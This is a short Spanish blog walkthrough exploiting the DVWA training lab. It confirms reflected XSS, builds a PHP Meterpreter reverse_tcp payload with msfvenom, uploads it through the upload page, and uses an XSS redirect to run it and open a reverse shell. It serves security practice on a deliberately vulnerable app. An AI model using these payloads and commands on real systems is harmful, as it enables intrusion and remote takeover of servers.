Hola amigos.
Hoy vamos a jugar un poquito con xss,
en esta ocasión, usaremos dvwa, ya que lo estamos haciendo
últimamente.
Para trabajar, nos vamos a xss
reflejado.
Si le damos a view code, obtendremos el
código fuente
Como vemos, no hay ningún tipo de
filtro.
Si insertamos un nombre, nos saluda y
todo.
Comprobamos que es vulnerable a la
inyección xss.
<script>alert("hola");</script>
Ahora crearemos un payload de php
msfvenom -p php/meterpreter/reverse_tcp
LHOST=192.168.1.134 LPORT=4444 R > meterpreter.php
Subimos meterpreter.php a la pagina web
en el apartado upload
Ahora, abrimos el navegador y ponemos
<script>window.location=”http://192.168.1.134/dvwa/hackable/uploads/meterpreter.php”</script>
Ya estamos dentro.
Por favor, para poder seguir subiendo posts, es necesario que pinches en la publi. Muchas gracias.
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.